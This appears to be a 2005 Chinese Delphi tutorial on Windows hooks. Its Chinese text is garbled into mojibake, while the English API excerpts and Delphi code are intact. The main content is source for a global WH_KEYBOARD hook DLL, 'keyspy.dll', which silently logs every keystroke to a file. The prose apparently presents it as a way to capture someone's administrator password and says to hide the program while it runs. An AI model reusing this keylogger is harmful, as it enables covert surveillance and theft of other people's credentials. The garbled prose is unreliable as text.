Delphi

±¾ÀàÔĶÁTOP10
¡¤·Ö²¼Ê½ÍøÂ翼ÊÔϵͳԭÐÍ·ÖÎö¼°ÊµÏÖ
¡¤ÓÎÏ·Íâ¹ÒÉè¼Æ¼¼Êõ̽ÌÖ¢Ù
¡¤Ê¹Ó**OOKËæÐļàÊÓWindows
¡¤Delphi Ë®¾§±¨±í´ò°ü½â¾ö
¡¤ÊÔÌâ¿â¿ª·¢ÖзÇÎı¾Êý¾ÝµÄ´¦Àí
¡¤ÈçºÎ½«¼¸¸öDBGRIDÀïµÄÄÚÈݵ¼Èëͬһ¸öEXCEL±íÖÐ....µÄÎÊÌâ
¡¤ÈçºÎʹÓÃDelphiÉè¼ÆÇ¿´óµÄ·þÎñÆ÷³ÌÐò
¡¤¹¤ÈËÏß³ÌÖйرմ°ÌåµÄʵÏÖ
¡¤ÓÃDLL·½Ê½·â×°MDI×Ó´°Ìå¡£
¡¤Ö§³ÖXPÏÂÍÐÅÌÀ¸ÆøÇòÌáʾµÄÍÐÅ̵¥Ôª

¡ú ·ÖÀർº½
VCÓïÑÔDelphi
VBÓïÑÔASP
PerlJava
ScriptÊý¾Ý¿â
ÆäËûÓïÑÔÓÎÏ·¿ª·¢
Îļþ¸ñʽÍøÕ¾ÖÆ×÷
Èí¼þ¹¤³Ì.NET¿ª·¢
ʹÓ**OOKËæÐļàÊÓWindows

×÷ÕߣºÎ´Öª À´Ô´£ºÔ¹âÈí¼þÕ¾ ¼ÓÈëʱ¼ä£º2005-2-28¡¡Ô¹âÈí¼þÕ¾

ÿ¸ö³ÌÐò¶¼ÓÐ×Ô¼ºµÄÉú´æ¿Õ¼ä£¬ÔÚWindowsϵͳÖÐÄã¿ÉÒÔÔÚÈκÎʱºòÈÃÄãµÄ³ÌÐòÖ´ÐÐһЩ²Ù×÷£¬»¹¿ÉÒÔ´¥·¢ÏûÏ¢£¬´¥·¢µÄÏûÏ¢·ÖΪÈýÖÖ£¬Ò»ÊDzÙ×÷Äã³ÌÐòµÄ½çÃ棬onClick£¬onMouseMoveµÈµÈ£¬ÁíÍâÒ»¸ö¿ÉÒÔʹÓÃWindowsµÄÏûÏ¢»úÖÆÀ´²¶»ñһЩϵͳÏûÏ¢£¬µ«ÊÇÈç¹ûÄãÏëÔÚÈκÎʱºò¼à¿ØÈκγÌÐòµÄÇé¿öÄÇ¿ÉÄÜÄã¾Í»áÑ¡ÔñHOOKÀ´ÊµÏÖÁË£¬ËäÈ»»¹ÓÐÆäËû·½·¨£¬µ«²»µÃ²»³ÐÈÏ£¬HOOKÊÇÒ»¸ö±È½Ï¼òµ¥½â¾öÎÊÌâµÄ;¾¶¡£

WindowsÌṩÁËHook»úÖÆ£¬¶¨ÒåΪ
A callback function provided by an application that receives certain data before the normal recipient of the data. The hook function can thus examine or modify the data before passing it on.

¿ÉÒÔʹÓÃÖî¶àHookµÄ·½Ê½£¬Ò»ÏÂÁоÙһЩ³£ÓõIJÎÊý£¬ÕâЩÔÚWINDWOS API°ïÖúÖж¼ÓУº

CALLWNDPROC £¬CALLWNDPROCRET £º
The WH_CALLWNDPROC and WH_CALLWNDPROCRET hooks enable you to monitor messages sent to window procedures by the SendMessage function. Windows calls a WH_CALLWNDPROC hook procedure before passing the message to the receiving window procedure, and calls the WH_CALLWNDPROCRET hook procedure after the window procedure has processed the message.

CBT£º

Windows calls a WH_CBT hook procedure before activating, creating, destroying, minimizing, maximizing, moving, or sizing a window; before completing a system command; before removing a mouse or keyboard event from the system message queue; before setting the input focus; or before synchronizing with the system message queue. The value the hook procedure returns determines whether Windows allows or prevents one of these operations. The WH_CBT hook is intended primarily for computer-based training (CBT) applications.


KEYBOARD£º
he WH_KEYBOARD hook enables an application to monitor message traffic for WM_KEYDOWN and WM_KEYUP messages about to be returned by the GetMessage or PeekMessage function. You can use the WH_KEYBOARD hook to monitor keyboard input posted to a message queue.

ÏÂÃæ¾ÍÀ´¾Ù¸öÀý×Ó£¨Ê¹ÓÃDelphi7.0µ÷ÊÔͨ¹ý£©£º
Èç¹ûÄãÐèÒª·ÃÎÊij¸öÈ˵ĻúÆ÷£¬ÄÇÔÚÔËÐÐ\\SBÖ®ºóÄǸöÈ˾ͻáÔÚÄã»úÆ÷ÉÏÇÃÈëËûµÄadminsitratorÃÜÂ룬µ±È»£¬ÄãÒ²¿ÉÒÔʹÓúڿ͹¤¾ßÀ´µÃµ½ËûµÄÃÜÂ룬µ«ÊÇ£¬ÎªÊ²Ã´²»×Ô¼º³¢ÊÔÒ»ÏÂд¸ö³ÌÐò¼Ç¼ËùÓеļüÅ̲Ù×÷ÄØ£¿

Ê×ÏÈÐèÒªÉêÃ÷Ò»µã£¬Hook²»Í¬ÓÚÒ»°ãµÄÓ¦ÓóÌÐò£¬ÐèÒª×÷Ϊһ¸öÈ«¾ÖDLL³öÏÖ£¬·ñÔòÎÞ·¨ÔÚÄã³ÌÐò²»¼¤»îµÄ״̬²¶»ñÆäËûÐÅÏ¢µÄ£¬£¨µ±È»Äã¿ÉÒÔÓÃWindowsÏûÏ¢£¬Õâ¸öÎÊÌâ²»ÔÚÕâÀïÌÖÂÛ£©¡£

д¸öDLL¶¨ÒåһϺ¯Êý
function setkeyhook:bool;export;
function endkeyhook:bool;export;
procedure keyhookexit;far;
procedure SetMainHandle(Handle: HWND); export;forward;
function keyboardhookhandler(icode:integer;wparam:wparam;lparam:lparam):lresult;stdcall;export;


procedure EntryPointProc(Reason: Integer);
const
    hMapObject: THandle = 0;
begin
    case reason of
        DLL_PROCESS_ATTACH:
            begin
            hMapObject := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(THookRec), '_CBT');
            rHookRec := MapViewOfFile(hMapObject, FILE_MAP_WRITE, 0, 0, 0);
            end;

        DLL_PROCESS_DETACH:
            begin
                try
                  UnMapViewOfFile(rHookRec);
                  CloseHandle(hMapObject);
                except
                end;
            end;
    end;
end;

procedure keyhookexit;far;
begin
  if hNexthookproc<>0 then endkeyhook;
  exitproc:=procsaveexit;
end;

function endkeyhook:bool;export;
begin
  if hNexthookproc<>0 then
  begin
    unhookwindowshookex(hNexthookproc);
    hNexthookproc:=0;
    messagebeep(0);
  end;
  result:=hNexthookproc=0;
 MainHandle:=0;
end;


function Setkeyhook:bool;export;
begin
  hNexthookproc:=SetWindowsHookEx(WH_KEYBOARD ,keyboardhookhandler,HInstance,0);
  result:=hNexthookproc<>0;
end;

function keyboardhookhandler(icode:integer;wparam:wparam;
  lparam:lparam):lresult;stdcall;export;
var
  s:Tstringlist;
begin

  if icode<0 then
  begin
    result:=CallNextHookEX(hNexthookproc,icode,wparam,lparam);
    exit;
  end;
  if lparam<0 then
  begin
    exit;
  end;
  s:=TStringlist.Create;
  if FileExists(afilename) then
    s.LoadFromFile(afilename);

//½«ÇôòµÄ¼üÅÌ×Ö·û±£´æµ½ÎļþÖР
s.Add(formatdatetime('YYYYMMDD hh:nn:ss:zzz:  ',now) + char(wParam) );
  s.SaveToFile(afilename);
  s.Free;
 
  result:=0;
end;

DllµÄProjectÎļþÖж¨ÒåÈçÏÂ
exports
  setkeyhook index 1,
  endkeyhook index 2,
  SetMainHandle index 3;

 

begin    

  hNexthookproc:=0;
  procsaveexit:=exitproc;
    DllProc := @EntryPointProc;
    EntryPointProc(DLL_PROCESS_ATTACH);
end.

ÕâÑùDLL¾Í¶¨ÒåºÃÁË£¬½ÓÏÂÀ´¾ÍÊÇ»­¸ö½çÃæ
function setkeyhook:bool;external 'keyspy.dll';
function endkeyhook:bool;external 'keyspy.dll';
procedure SetMainHandle(Handle: HWND); external 'keyspy.dll';
//¿ªÊ¼²¶»ñ¼üÅÌ

  SetMainHandle(handle);
 setkeyhook
//ÖÐÖ¹²¶»ñ¼üÅÌ
   endkeyhook

È»ºó°ÉÄã³ÌÐòÒþ±ÎÆðÀ´£¬Æô¶¯²¶»ñ¼üÅÌ£¬ÔÚÖÐÖ¹²¶»ñ֮ǰ£¬ËùÓмüÅ̲Ù×÷¶¼»á±»¼Ç¼µ½ÄãËù¶¨ÒåµÄfilenameÕâ¸öÎļþÃûÖÐÈ¥£¬×¢£ºÕâЩ´úÂëÊÇÁÙʱдµÄ£¬½öÊÇΪÁË˵Ã÷ÈçºÎд¸öhook³ÌÐò¡£

ÁíÍâHookµÄ¹¦Äܲ»½ö½öÊǼòµ¥Ê¹Óã¬Õâ¾ÍÐèÒª¿¿´ó¼ÒÁé»îÔËÓÃÁË£¬¿ÉÒÔ¸úºÜ¶àwindows APIÀ´ÅäºÏ£¬Í¨¹ýºÜ¶à¼¼ÇÉ×÷³öÈÃÈËÒâÏë²»µ½µÄЧ¹û¡£

Ïà¹ØÎÄÕ£º

Ïà¹ØÈí¼þ£º